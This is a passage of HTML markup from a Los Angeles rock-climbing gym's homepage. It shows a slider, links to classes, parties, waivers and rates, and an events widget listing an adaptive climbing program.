data-mobileportraitpadding="30|*|10|*|30|*|10|*|px+" data-desktopportraitinneralign="inherit" data-sstype="content" data-hasbackground="0" data-rotation="0" data-desktopportrait="1" data-desktoplandscape="1" data-tabletportrait="1" data-tabletlandscape="1" data-mobileportrait="1" data-mobilelandscape="1" data-adaptivefont="1" data-desktopportraitfontsize="100" data-plugin="rendered"><div class="n2-ss-section-main-content n2-ss-layer-content n2-ow" style="padding:1.25em 1.25em 1.25em 1.25em ;" data-verticalalign="center"><div class="n2-ss-layer n2-ow" style="margin:0em 0em 0.625em 0em ;overflow:visible;" data-pm="normal" data-desktopportraitmargin="0|*|0|*|10|*|0|*|px+" data-desktopportraitheight="0" data-has-maxwidth="0" data-desktopportraitmaxwidth="0" data-cssselfalign="inherit" data-desktopportraitselfalign="inherit" data-sstype="layer" data-rotation="0" data-desktopportrait="1" data-desktoplandscape="1" data-tabletportrait="1" data-tabletlandscape="1" data-mobileportrait="1" data-mobilelandscape="1" data-adaptivefont="0" data-desktopportraitfontsize="100" data-plugin="rendered"><div id="n2-ss-2item7" class="n2-font-b04df6a52b104228032d2ad4ddd4a501-hover n2-style-29fe619a321c49aaf9d97344cf838bc3-heading n2-ss-item-content n2-ow" style="display:inline-block;white-space:nowrap;">NEW</div></div><div class="n2-ss-layer n2-ow" style="margin:0em 0em 1.875em 0em ;overflow:visible;" data-pm="normal" data-desktopportraitmargin="0|*|0|*|30|*|0|*|px+" data-tabletportraitmargin="0|*|0|*|30|*|0|*|px+" data-mobileportraitmargin="0|*|0|*|10|*|0|*|px+" data-desktopportraitheight="0" data-has-maxwidth="0" data-desktopportraitmaxwidth="0" data-cssselfalign="inherit" data-desktopportraitselfalign="inherit" data-sstype="layer" data-rotation="0" data-desktopportrait="1" data-desktoplandscape="1" data-tabletportrait="1" data-tabletlandscape="1" data-mobileportrait="1" data-mobilelandscape="1" data-adaptivefont="0" data-desktopportraitfontsize="100" data-tabletportraitfontsize="80" data-mobileportraitfontsize="65" data-plugin="rendered"><div id="n2-ss-2item8" class=" n2-ss-item-content n2-ow" style="display:block;"><a class="n2-ow n2-font-72917a316ce8c8cb95a049042a70df00-hover " style="display:block;" href="https://rockreation-cm.com/comps/">EPIC ROCK CLIMBING<br />COMPETITIONS</a></div></div><div class="n2-ss-layer n2-ow" style="margin:0em 0em 0em 0em ;overflow:visible;" data-pm="normal" data-desktopportraitmargin="0|*|0|*|0|*|0|*|px+" data-desktopportraitheight="0" data-has-maxwidth="0" data-desktopportraitmaxwidth="0" data-cssselfalign="inherit" data-desktopportraitselfalign="inherit" data-sstype="layer" data-rotation="0" data-desktopportrait="1" data-desktoplandscape="1" data-tabletportrait="1" data-tabletlandscape="1" data-mobileportrait="1" data-mobilelandscape="1" data-adaptivefont="0" data-desktopportraitfontsize="100" data-plugin="rendered"><div class="n2-ss-button-container n2-ss-item-content n2-ow n2-font-75774b5a595fadfc3656349b99c5effa-link n2-ss-nowrap"><a class="n2-style-cf6192b2903574c3fa2e25e3b85c8d68-heading n2-ow " href="https://rockreation-cm.com/comps/"><div><div>Coming Up...</div></div></a></div></div></div></div></div></div><div data-slide-duration="0" data-id="6" data-thumbnail="//rockreation-la.com/wp-content/uploads/2016/01/Setting-2669-e1452182227681.jpg" style="" class=" n2-ss-slide n2-ss-canvas n2-ow n2-ss-slide-6"><div class="n2-ss-slide-background n2-ow" data-mode="fill"><div data-hash="e01e60a011953f6ba30fdd59625127d6" data-desktop="//rockreation-la.com/wp-content/uploads/2016/01/Setting-2669-e1452182227681.jpg" class="n2-ss-slide-background-image" data-blur="0"><img src="//rockreation-la.com/wp-content/uploads/2016/01/Setting-2669-e1452182227681.jpg" alt="" /></div></div><div class="n2-ss-layers-container n2-ow" data-csstextalign="center" style=""><div class="n2-ss-layer n2-ow" style="max-width: 740px;overflow:visible;" data-csstextalign="inherit" data-has-maxwidth="1" data-desktopportraitmaxwidth="740" data-cssselfalign="inherit" data-desktopportraitselfalign="inherit" data-pm="content" data-desktopportraitpadding="20|*|20|*|20|*|20|*|px+" data-desktopportraitinneralign="inherit" data-sstype="content" data-hasbackground="0" data-rotation="0" data-desktopportrait="1" data-desktoplandscape="1" data-tabletportrait="1" data-tabletlandscape="1" data-mobileportrait="1" data-mobilelandscape="1" data-adaptivefont="1" data-desktopportraitfontsize="100" data-plugin="rendered"><div class="n2-ss-section-main-content n2-ss-layer-content n2-ow" style="padding:1.25em 1.25em 1.25em 1.25em ;" data-verticalalign="center"><div class="n2-ss-layer n2-ow" style="margin:0em 0em 0.625em 0em ;overflow:visible;" data-pm="normal" data-desktopportraitmargin="0|*|0|*|10|*|0|*|px+" data-desktopportraitheight="0" data-has-maxwidth="0" data-desktopportraitmaxwidth="0" data-cssselfalign="inherit" data-desktopportraitselfalign="inherit" data-sstype="layer" data-rotation="0" data-desktopportrait="1" data-desktoplandscape="1" data-tabletportrait="1" data-tabletlandscape="1" data-mobileportrait="1" data-mobilelandscape="1" data-adaptivefont="0" data-desktopportraitfontsize="100" data-plugin="rendered"><div id="n2-ss-2item10" class="n2-font-df31ee031043c529155c9cacd7429d0d-hover n2-style-29fe619a321c49aaf9d97344cf838bc3-heading n2-ss-item-content n2-ow" style="display:inline-block;white-space:nowrap;">CROSSTRAINING</div></div><div class="n2-ss-layer n2-ow" style="margin:0em 0em 1.875em 0em ;overflow:visible;" data-pm="normal" data-desktopportraitmargin="0|*|0|*|30|*|0|*|px+" data-mobileportraitmargin="0|*|0|*|10|*|0|*|px+" data-desktopportraitheight="0" data-has-maxwidth="0" data-desktopportraitmaxwidth="0" data-cssselfalign="inherit" data-desktopportraitselfalign="inherit" data-sstype="layer" data-rotation="0" data-desktopportrait="1" data-desktoplandscape="1" data-tabletportrait="1" data-tabletlandscape="1" data-mobileportrait="1" data-mobilelandscape="1" data-adaptivefont="0" data-desktopportraitfontsize="100" data-tabletportraitfontsize="80" data-mobileportraitfontsize="60" data-plugin="rendered"><div id="n2-ss-2item11" class=" n2-ss-item-content n2-ow" style="display:block;"><a class="n2-ow n2-font-72917a316ce8c8cb95a049042a70df00-hover " style="display:block;" href="https://rockreation-la.com/facilities/">ROCK CLIMBING, YOGA AND FITNESS</a></div></div><div class="n2-ss-layer n2-ow" style="margin:0em 0em 0em 0em ;overflow:visible;" data-pm="normal" data-desktopportraitmargin="0|*|0|*|0|*|0|*|px+" data-tabletportraitmargin="0|*|0|*|0|*|0|*|px+" data-mobileportraitmargin="0|*|0|*|0|*|0|*|px+" data-desktopportraitheight="0" data-has-maxwidth="0" data-desktopportraitmaxwidth="0" data-cssselfalign="inherit" data-desktopportraitselfalign="inherit" data-sstype="layer" data-rotation="0" data-desktopportrait="1" data-desktoplandscape="1" data-tabletportrait="1" data-tabletlandscape="1" data-mobileportrait="1" data-mobilelandscape="1" data-adaptivefont="0" data-desktopportraitfontsize="100" data-plugin="rendered"><div class="n2-ss-button-container n2-ss-item-content n2-ow n2-font-75774b5a595fadfc3656349b99c5effa-link n2-ss-nowrap"><a class="n2-style-cf6192b2903574c3fa2e25e3b85c8d68-heading n2-ow " href="https://rockreation-la.com/facilities/"><div><div>Facilities</div></div></a></div></div></div></div></div></div><div data-slide-duration="0" data-id="7" data-thumbnail="https://i.ytimg.com/vi/8m1oomqqB4k/maxresdefault.jpg" style="" class=" n2-ss-slide n2-ss-canvas n2-ow n2-ss-slide-7"><div class="n2-ss-slide-background n2-ow" data-mode="fill"></div><div class="n2-ss-layers-container n2-ow" data-csstextalign="center" style=""><div class="n2-ss-layer n2-ow n2-ss-layer-needsize" style="left:0px;top:0px;width:100%;height:100%;overflow:visible;" data-pm="absolute" data-responsiveposition="1" data-desktopportraitleft="0" data-desktopportraittop="0" data-responsivesize="1" data-desktopportraitwidth="100%" data-desktopportraitheight="100%" data-desktopportraitalign="center" data-desktopportraitvalign="middle" data-parentid="" data-desktopportraitparentalign="center" data-desktopportraitparentvalign="middle" data-sstype="layer" data-rotation="0" data-desktopportrait="1" data-desktoplandscape="1" data-tabletportrait="1" data-tabletlandscape="1" data-mobileportrait="1" data-mobilelandscape="1" data-adaptivefont="0" data-desktopportraitfontsize="100" data-plugin="rendered"><div id="n2-ss-2item13" class="n2-ss-layer-player n2-ss-item-content n2-ow-all"><div id="n2-ss-2item13-frame"></div><div class="n2-ss-layer-player n2-ss-layer-player-cover" style="cursor:pointer; background: URL(https://i.ytimg.com/vi/8m1oomqqB4k/maxresdefault.jpg) no-repeat 50% 50%; background-size: cover"><img style="width:48px;height:48px;margin-left:-24px;margin-top:-24px;" src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCA0OCA0OCI+PGcgZmlsbD0ibm9uZSIgZmlsbC1ydWxlPSJldmVub2RkIj48Y2lyY2xlIGN4PSIyNCIgY3k9IjI0IiByPSIyNCIgZmlsbD0iIzAwMCIgb3BhY2l0eT0iLjYiLz48cGF0aCBmaWxsPSIjRkZGIiBkPSJNMTkuOCAzMmMtLjEyNCAwLS4yNDctLjAyOC0uMzYtLjA4LS4yNjQtLjExNi0uNDM2LS4zNzUtLjQ0LS42NjRWMTYuNzQ0Yy4wMDUtLjI5LjE3Ni0uNTUuNDQtLjY2Ni4yNzMtLjEyNi41OTItLjEuODQuMDdsMTAuNCA3LjI1N2MuMi4xMzIuMzIuMzU1LjMyLjU5NXMtLjEyLjQ2My0uMzIuNTk1bC0xMC40IDcuMjU2Yy0uMTQuMS0uMzEuMTUtLjQ4LjE1eiIvPjwvZz48L3N2Zz4=" alt="Play" /></div></div></div></div></div> </div> </div> <div data-ssleft="0+5" data-sstop="height/2-previousheight/2" id="n2-ss-2-arrow-previous" class="n2-ss-widget n2-ss-widget-display-desktop n2-ss-widget-display-tablet n2-ss-widget-display-mobile nextend-arrow n2-ow nextend-arrow-previous nextend-arrow-animated-fade n2-ib" style="position: absolute;" role="button" aria-label="Previous slide" tabindex="0"><img class="n2-ow" data-no-lazy="1" data-hack="data-lazy-src" src="data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMzIiIGhlaWdodD0iMzIiIHZpZXdCb3g9IjAgMCAzMiAzMiIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48cGF0aCBkPSJNMjEuNjg4IDE0LjY4OGgtNy45NTVsMS44MzMtMS42NS0uMDA0LS4wMDNjLjI2Ny0uMjQuNDM4LS41ODUuNDM4LS45NzMgMC0uNzI0LS41ODgtMS4zMTItMS4zMTMtMS4zMTItLjMzNyAwLS42NDIuMTMtLjg3NC4zNGwtLjAwNC0uMDAzLTQuMzc2IDMuOTM3LjAwNC4wMDRDOS4xNyAxNS4yNjggOSAxNS42MTIgOSAxNnMuMTcuNzMyLjQzOC45NzJsLS4wMDQuMDA0IDQuMzc1IDMuOTM3LjAwMi0uMDAzYy4yMzMuMjEuNTM4LjM0Ljg3Ni4zNC43MjQgMCAxLjMxMi0uNTg4IDEuMzEyLTEuMzEzIDAtLjM4Ny0uMTctLjczLS40MzgtLjk3MmwuMDA0LS4wMDMtMS44MzMtMS42NWg3Ljk1NGMuNzI1IDAgMS4zMTMtLjU4NyAxLjMxMy0xLjMxMiAwLS43MjUtLjU4OC0xLjMxMy0xLjMxMy0xLjMxM3pNMTYgMkM4LjI2OCAyIDIgOC4yNjggMiAxNnM2LjI2OCAxNCAxNCAxNCAxNC02LjI2OCAxNC0xNFMyMy43MzIgMiAxNiAyem0wIDI1LjM3NUM5LjcxOCAyNy4zNzUgNC42MjUgMjIuMjgyIDQuNjI1IDE2UzkuNzE4IDQuNjI1IDE2IDQuNjI1IDI3LjM3NSA5LjcxOCAyNy4zNzUgMTYgMjIuMjgyIDI3LjM3NSAxNiAyNy4zNzV6IiBmaWxsPSIjZmZmZmZmIiBvcGFjaXR5PSIwLjgiIGZpbGwtcnVsZT0iZXZlbm9kZCIvPjwvc3ZnPg==" alt="previous arrow" /></div> <div data-ssright="0+5" data-sstop="height/2-nextheight/2" id="n2-ss-2-arrow-next" class="n2-ss-widget n2-ss-widget-display-desktop n2-ss-widget-display-tablet n2-ss-widget-display-mobile nextend-arrow n2-ow nextend-arrow-next nextend-arrow-animated-fade n2-ib" style="position: absolute;" role="button" aria-label="Next slide" tabindex="0"><img class="n2-ow" data-no-lazy="1" data-hack="data-lazy-src" src="data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMzIiIGhlaWdodD0iMzIiIHZpZXdCb3g9IjAgMCAzMiAzMiIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48cGF0aCBkPSJNMTguMTkgMTEuMDg3Yy0uMjM1LS4yMDYtLjU0LS4zMzctLjg3OC0uMzM3LS43MjQgMC0xLjMxMi41ODgtMS4zMTIgMS4zMTMgMCAuMzg3LjE3LjczLjQzOC45NzJsMS44MyAxLjY1MkgxMC4zMUM5LjU4OCAxNC42ODcgOSAxNS4yNzUgOSAxNnMuNTg4IDEuMzEzIDEuMzEzIDEuMzEzaDcuOTU0bC0xLjgzMyAxLjY1Yy0uMjYzLjI0My0uNDM0LjU4Ny0uNDM0Ljk3NCAwIC43MjUuNTg4IDEuMzEzIDEuMzEzIDEuMzEzLjMzNyAwIC42NDItLjEzLjg3NS0uMzRsNC4zNzgtMy45MzRjLjI2My0uMjQ0LjQzNC0uNTg4LjQzNC0uOTc2cy0uMTctLjczMi0uNDM4LS45NzJsLTQuMzctMy45NHpNMTYgMkM4LjI2OCAyIDIgOC4yNjggMiAxNnM2LjI2OCAxNCAxNCAxNCAxNC02LjI2OCAxNC0xNFMyMy43MzIgMiAxNiAyem0wIDI1LjM3NUM5LjcxOCAyNy4zNzUgNC42MjUgMjIuMjgyIDQuNjI1IDE2UzkuNzE4IDQuNjI1IDE2IDQuNjI1IDI3LjM3NSA5LjcxOCAyNy4zNzUgMTYgMjIuMjgyIDI3LjM3NSAxNiAyNy4zNzV6IiBmaWxsPSIjZmZmZmZmIiBvcGFjaXR5PSIwLjgiIGZpbGwtcnVsZT0iZXZlbm9kZCIvPjwvc3ZnPg==" alt="next arrow" /></div> <div data-ssleft="width/2-bulletwidth/2" data-ssbottom="0+5" data-offset="5" class="n2-ss-widget n2-ss-widget-display-desktop n2-ss-widget-display-tablet n2-ss-widget-display-mobile n2-flex n2-ss-control-bullet n2-ss-control-bullet-horizontal" style="position: absolute;"><div class=" nextend-bullet-bar n2-ow n2-bar-justify-content-center"></div></div> </div> </div><div class="n2-clear"></div><div id="n2-ss-2-spinner" style="display: none;"><div><div class="n2-ss-spinner-simple-white-container"><div class="n2-ss-spinner-simple-white"></div></div></div></div></div></div><div id="n2-ss-2-placeholder" style="position: relative;z-index:2;background-color:RGBA(0,0,0,0);max-height:600px; background-color:RGBA(255,255,255,0);"><img style="width: 100%; max-width:10000px; display: block;opacity:0;margin:0px;" class="n2-ow" src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZlcnNpb249IjEuMCIgd2lkdGg9IjEyMDAiIGhlaWdodD0iMzc1IiA+PC9zdmc+" alt="Slider" /></div></div> </div> </div> <div class="vc_empty_space" style="height: 32px" ><span class="vc_empty_space_inner"><div class="empty_space_image" ></div> </span></div> <div class="wpb_text_column wpb_content_element vc_custom_1482370750914"> <div class="wpb_wrapper"> <h2>Offering Climbing, Cross-Training and Community Since 1993</h2> </div> </div> <div class="separator transparent " style="margin-top:30px;margin-bottom:0px"></div> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <h4 style="text-align: center;">With over 20 years experience bringing versatile rock climbing and cross training facilities to the Los Angeles area</h4> </div> </div> <div class="vc_empty_space" style="height: 32px" ><span class="vc_empty_space_inner"><div class="empty_space_image" ></div> </span></div> <div class="separator normal " style="margin-bottom:0px"></div> </div></div></div></div></div><div class="vc_row wpb_row section " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner vc_custom_1525644170990"><div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element vc_custom_1525649359692"> <div class="wpb_wrapper"> <h3 style="text-align: center;"><a href="https://rockreation-la.com/new-to-rockreation/">NEW TO CLIMBING? CLICK HERE! </a></h3> </div> </div> <div class='projects_holder_outer v4 portfolio_no_space portfolio_with_hover_text '><div class='portfolio_main_holder projects_holder clearfix v4 hover_text no_space'> <article class='mix portfolio_category_108 portfolio_category_107 portfolio_category_109 '><div class="item_holder subtle_vertical_hover"><div class="text_holder"><div class="text_holder_outer"><div class="text_holder_inner"><h4 class="portfolio_title" ><a href="https://rockreation-la.com/birthdayparties/" >Birthday Parties</a></h4></div></div></div><a class="portfolio_link_class" href="https://rockreation-la.com/birthdayparties/" target="_self"></a><div class="portfolio_shader" style="background-color:rgba(32,38,29,0.82);"></div><div class="image_holder"><span class="image"><img width="640" height="452" src="https://rockreation-la.com/wp-content/uploads/2016/12/BirthdaysRockreationLA.jpg" class="attachment-full size-full wp-post-image" alt="" srcset="https://rockreation-la.com/wp-content/uploads/2016/12/BirthdaysRockreationLA.jpg 640w, https://rockreation-la.com/wp-content/uploads/2016/12/BirthdaysRockreationLA-300x212.jpg 300w, https://rockreation-la.com/wp-content/uploads/2016/12/BirthdaysRockreationLA-610x431.jpg 610w" sizes="(max-width: 640px) 100vw, 640px" /></span></div></div></article> <article class='mix portfolio_category_109 '><div class="item_holder subtle_vertical_hover"><div class="text_holder"><div class="text_holder_outer"><div class="text_holder_inner"><h4 class="portfolio_title" ><a href="https://rockreation-la.com/climbing-classes/" >Classes</a></h4></div></div></div><a class="portfolio_link_class" href="https://rockreation-la.com/climbing-classes/" target="_self"></a><div class="portfolio_shader" style="background-color:rgba(32,38,29,0.82);"></div><div class="image_holder"><span class="image"><img width="640" height="452" src="https://rockreation-la.com/wp-content/uploads/2016/12/ClassesRockreationLA.jpg" class="attachment-full size-full wp-post-image" alt="" srcset="https://rockreation-la.com/wp-content/uploads/2016/12/ClassesRockreationLA.jpg 640w, https://rockreation-la.com/wp-content/uploads/2016/12/ClassesRockreationLA-300x212.jpg 300w, https://rockreation-la.com/wp-content/uploads/2016/12/ClassesRockreationLA-610x431.jpg 610w" sizes="(max-width: 640px) 100vw, 640px" /></span></div></div></article> <article class='mix portfolio_category_109 '><div class="item_holder subtle_vertical_hover"><div class="text_holder"><div class="text_holder_outer"><div class="text_holder_inner"><h4 class="portfolio_title" ><a href="https://rockreation-la.com/facilities/" >Facility</a></h4></div></div></div><a class="portfolio_link_class" href="https://rockreation-la.com/facilities/" target="_self"></a><div class="portfolio_shader" style="background-color:rgba(32,38,29,0.82);"></div><div class="image_holder"><span class="image"><img width="640" height="452" src="https://rockreation-la.com/wp-content/uploads/2015/03/Facility_HOMEPORT.jpg" class="attachment-full size-full wp-post-image" alt="" srcset="https://rockreation-la.com/wp-content/uploads/2015/03/Facility_HOMEPORT.jpg 640w, https://rockreation-la.com/wp-content/uploads/2015/03/Facility_HOMEPORT-300x212.jpg 300w, https://rockreation-la.com/wp-content/uploads/2015/03/Facility_HOMEPORT-610x431.jpg 610w" sizes="(max-width: 640px) 100vw, 640px" /></span></div></div></article> <article class='mix portfolio_category_109 '><div class="item_holder subtle_vertical_hover"><div class="text_holder"><div class="text_holder_outer"><div class="text_holder_inner"><h4 class="portfolio_title" ><a href="https://rockreation-la.com/new-to-rockreation/" >New Climbers!</a></h4></div></div></div><a class="portfolio_link_class" href="https://rockreation-la.com/new-to-rockreation/" target="_self"></a><div class="portfolio_shader" style="background-color:rgba(32,38,29,0.82);"></div><div class="image_holder"><span class="image"><img width="640" height="452" src="https://rockreation-la.com/wp-content/uploads/2016/12/NewClimbersRockreationLA.jpg" class="attachment-full size-full wp-post-image" alt="" srcset="https://rockreation-la.com/wp-content/uploads/2016/12/NewClimbersRockreationLA.jpg 640w, https://rockreation-la.com/wp-content/uploads/2016/12/NewClimbersRockreationLA-300x212.jpg 300w, https://rockreation-la.com/wp-content/uploads/2016/12/NewClimbersRockreationLA-610x431.jpg 610w" sizes="(max-width: 640px) 100vw, 640px" /></span></div></div></article> <article class='mix portfolio_category_109 '><div class="item_holder subtle_vertical_hover"><div class="text_holder"><div class="text_holder_outer"><div class="text_holder_inner"><h4 class="portfolio_title" ><a href="https://rockreation-la.com/job-postings/" >Job Postings</a></h4></div></div></div><a class="portfolio_link_class" href="https://rockreation-la.com/job-postings/" target="_self"></a><div class="portfolio_shader" style="background-color:rgba(32,38,29,0.82);"></div><div class="image_holder"><span class="image"><img width="640" height="452" src="https://rockreation-la.com/wp-content/uploads/2016/12/JobsRockreationLA.jpg" class="attachment-full size-full wp-post-image" alt="" srcset="https://rockreation-la.com/wp-content/uploads/2016/12/JobsRockreationLA.jpg 640w, https://rockreation-la.com/wp-content/uploads/2016/12/JobsRockreationLA-300x212.jpg 300w, https://rockreation-la.com/wp-content/uploads/2016/12/JobsRockreationLA-610x431.jpg 610w" sizes="(max-width: 640px) 100vw, 640px" /></span></div></div></article> <article class='mix portfolio_category_109 '><div class="item_holder subtle_vertical_hover"><div class="text_holder"><div class="text_holder_outer"><div class="text_holder_inner"><h4 class="portfolio_title" ><a href="https://rockreation-la.com/online-waivers/" >Waiver</a></h4></div></div></div><a class="portfolio_link_class" href="https://rockreation-la.com/online-waivers/" target="_self"></a><div class="portfolio_shader" style="background-color:rgba(32,38,29,0.82);"></div><div class="image_holder"><span class="image"><img width="640" height="452" src="https://rockreation-la.com/wp-content/uploads/2015/06/Waiver_HOMEPORT-1.jpg" class="attachment-full size-full wp-post-image" alt="" srcset="https://rockreation-la.com/wp-content/uploads/2015/06/Waiver_HOMEPORT-1.jpg 640w, https://rockreation-la.com/wp-content/uploads/2015/06/Waiver_HOMEPORT-1-300x212.jpg 300w, https://rockreation-la.com/wp-content/uploads/2015/06/Waiver_HOMEPORT-1-610x431.jpg 610w" sizes="(max-width: 640px) 100vw, 640px" /></span></div></div></article> <article class='mix portfolio_category_109 '><div class="item_holder subtle_vertical_hover"><div class="text_holder"><div class="text_holder_outer"><div class="text_holder_inner"><h4 class="portfolio_title" ><a href="https://rockreation-la.com/rates/" >HOURS + RATES</a></h4></div></div></div><a class="portfolio_link_class" href="https://rockreation-la.com/rates/" target="_self"></a><div class="portfolio_shader" style="background-color:rgba(32,38,29,0.82);"></div><div class="image_holder"><span class="image"><img width="640" height="452" src="https://rockreation-la.com/wp-content/uploads/2016/12/HoursRockreationLA.jpg" class="attachment-full size-full wp-post-image" alt="" srcset="https://rockreation-la.com/wp-content/uploads/2016/12/HoursRockreationLA.jpg 640w, https://rockreation-la.com/wp-content/uploads/2016/12/HoursRockreationLA-300x212.jpg 300w, https://rockreation-la.com/wp-content/uploads/2016/12/HoursRockreationLA-610x431.jpg 610w" sizes="(max-width: 640px) 100vw, 640px" /></span></div></div></article> <article class='mix portfolio_category_109 '><div class="item_holder subtle_vertical_hover"><div class="text_holder"><div class="text_holder_outer"><div class="text_holder_inner"><h4 class="portfolio_title" ><a href="https://rockreation-la.com/for-kids/" >FOR KIDS!</a></h4></div></div></div><a class="portfolio_link_class" href="https://rockreation-la.com/for-kids/" target="_self"></a><div class="portfolio_shader" style="background-color:rgba(32,38,29,0.82);"></div><div class="image_holder"><span class="image"><img width="640" height="452" src="https://rockreation-la.com/wp-content/uploads/2018/05/Kids_HOMEPORT.jpg" class="attachment-full size-full wp-post-image" alt="" srcset="https://rockreation-la.com/wp-content/uploads/2018/05/Kids_HOMEPORT.jpg 640w, https://rockreation-la.com/wp-content/uploads/2018/05/Kids_HOMEPORT-300x212.jpg 300w, https://rockreation-la.com/wp-content/uploads/2018/05/Kids_HOMEPORT-610x431.jpg 610w" sizes="(max-width: 640px) 100vw, 640px" /></span></div></div></article> <div class='filler'></div> <div class='filler'></div> <div class='filler'></div> <div class='filler'></div> </div></div></div></div></div></div></div><div class="vc_row wpb_row section grid_section" style='background-color:#f2f2f2; padding-top:30px; padding-bottom:30px; text-align:center;'><div class=" section_inner clearfix"><div class='section_inner_margin clearfix'><div class="wpb_column vc_column_container vc_col-sm-6"><div class="vc_column-inner"><div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <h2 style="text-align: center;"><a href="https://rockreation-la.com/calendar/">Upcoming EVENTS</a></h2> </div> </div> <div class="vc_empty_space" style="height: 30px" ><span class="vc_empty_space_inner"><div class="empty_space_image" ></div> </span></div> <div id="uew_1" class="rhc-title-is-link rhc-supe rhc-upcoming-events6 rhc-supe-loading supe-simple-nav rhc-side-0" data-page="0" data-number="4" data-atts="{&quot;uid&quot;:1,&quot;test&quot;:&quot;&quot;,&quot;page&quot;:&quot;0&quot;,&quot;number&quot;:&quot;4&quot;,&quot;taxonomy&quot;:&quot;calendar&quot;,&quot;terms&quot;:&quot;events, closures&quot;,&quot;terms_children&quot;:&quot;&quot;,&quot;template&quot;:&quot;widget_custom_accordion.php&quot;,&quot;class&quot;:&quot;rhc-title-is-link rhc-supe rhc-upcoming-events6 rhc-supe-loading supe-simple-nav&quot;,&quot;prefix&quot;:&quot;uew&quot;,&quot;parse_postmeta&quot;:&quot;fc_color,fc_text_color,rhc_auw_cta_label,rhc_auw_cta_url,rhc_auw_cta_target&quot;,&quot;parse_taxonomy&quot;:&quot;1&quot;,&quot;parse_taxonomymeta&quot;:&quot;1&quot;,&quot;order&quot;:&quot;ASC&quot;,&quot;date&quot;:&quot;NOW&quot;,&quot;date_end&quot;:&quot;&quot;,&quot;date_compare&quot;:&quot;&quot;,&quot;date_end_compare&quot;:&quot;&quot;,&quot;horizon&quot;:&quot;hour&quot;,&quot;allday&quot;:&quot;&quot;,&quot;no_events_message&quot;:&quot;&quot;,&quot;post_status&quot;:&quot;publish&quot;,&quot;post_type&quot;:&quot;&quot;,&quot;author&quot;:&quot;&quot;,&quot;author_current&quot;:&quot;&quot;,&quot;do_shortcode&quot;:&quot;1&quot;,&quot;the_content&quot;:&quot;0&quot;,&quot;separator&quot;:&quot;&quot;,&quot;holder&quot;:&quot;1&quot;,&quot;dayspast&quot;:&quot;&quot;,&quot;premiere&quot;:&quot;0&quot;,&quot;auto&quot;:&quot;0&quot;,&quot;hideempty&quot;:&quot;0&quot;,&quot;feed&quot;:&quot;&quot;,&quot;words&quot;:&quot;&quot;,&quot;render_images&quot;:&quot;&quot;,&quot;calendar_url&quot;:&quot;&quot;,&quot;loading_overlay&quot;:&quot;1&quot;,&quot;for_sidebar&quot;:&quot;0&quot;,&quot;post_id&quot;:&quot;&quot;,&quot;current_post&quot;:&quot;&quot;,&quot;rdate&quot;:&quot;&quot;,&quot;js_init_script&quot;:&quot;&quot;,&quot;vc_js_init_script&quot;:&quot;jQuery(document).ready(function($){init_uew_widgets();});&quot;,&quot;nav&quot;:&quot;1&quot;,&quot;tax_and_filter&quot;:&quot;&quot;,&quot;header&quot;:&quot;&quot;,&quot;hierarchical_filter&quot;:&quot;0&quot;,&quot;terms_hide_empty&quot;:&quot;0&quot;,&quot;tax_filter_multiple&quot;:&quot;1&quot;,&quot;geo_radius&quot;:&quot;&quot;,&quot;geo_center&quot;:&quot;&quot;,&quot;local_tz&quot;:&quot;&quot;,&quot;tax_and_filtering&quot;:&quot;0&quot;,&quot;term_post_count&quot;:&quot;0&quot;,&quot;btn_tax_parent_only&quot;:&quot;&quot;,&quot;ajaxurl&quot;:&quot;https:\/\/rockreation-la.com\/?rhc_action=supe_get_events&quot;,&quot;taxonomy_default&quot;:&quot;calendar&quot;,&quot;terms_default&quot;:&quot;events, closures&quot;}"><div class="supe-head"></div><div class="supe-body"><div class="uew-loading"><div class="uew-loading-1"><div class="uew-loading-2 xspinner icon-xspinner-3"></div></div></div><div class="supe-item-holder"><div class="rhc-event-item rhc-widget-upcoming-item rhc-accordion-widget-item featured-0 rhc_top_image-imgset-1 rhc_dbox_image-imgset-1 rhc_tooltip_image-imgset-1 rhc_month_image-imgset-1" data-css_clear="opacity" style="opacity:0;" itemscope="" itemtype="http://schema.org/Event" data-post_id="52129"> <div class="rhc-widget-header" style="border-left: 5px solid #DD0303;" data-fc_color="#DD0303" data-fc_text_color=""> <div class="rhc-date with-end-date"> <div class="rhc-start-time"> <div class="rhc-start-month rhc-date-start rhc_date fc-date-format" data-udate="1555700400" data-fc_date_format="MMM" data-wptz1="0" data-wptz2="">Apr</div> <div class="rhc-start-daynumber rhc-date-start rhc_date fc-date-format" data-udate="1555700400" data-fc_date_format="dd" data-wptz1="0" data-wptz2="">19</div> </div> <div class="rhc-icon-dash if-different-date is-same-date">-</div> <div class="rhc-end-time if-different-date is-same-date"> <div class="rhc-end-month if-different-month rhc-date-end is-same-month rhc_date" data-udate="1555707600" data-fc_date_format="MMM" data-wptz1="0" data-wptz2="">Apr</div> <div class="rhc-end-daynumber rhc-date-end rhc_date" data-udate="1555707600" data-fc_date_format="dd" data-wptz1="0" data-wptz2="">19</div> </div> </div> <div class="rhc-title-info"> <a class="rhc-event-title rhc-title-link fc-event-list-title" href="https://rockreation-la.com/events/rockreation-adaptive-program/?event_rdate=20190419190000%2C20190419210000" itemprop="url">Adaptive Climbing Program</a> <div class="rhc-title" itemprop="name">Adaptive Climbing Program</div> <div class="rhc-time-location"> <div class="time rhc-allday-hidden"><span class="rhc-icon-time"></span><span class="rhc-widget-time rhc_date fc-date-format" data-udate="1555700400" data-fc_date_format="h:mmtt" data-wptz1="0" data-wptz2="">7:00pm</span></div> </div> </div> </div> <div class="rhc-widget-body"> <div class="rhc-event-image rhc_top_image-img-link"><a class="rhc-image-link" href="https://rockreation-la.com/events/rockreation-adaptive-program/"><img src="https://rockreation-la.com/wp-content/uploads/2018/03/AdaptiveProgram_adults-300x212.jpg"></a></div> <div 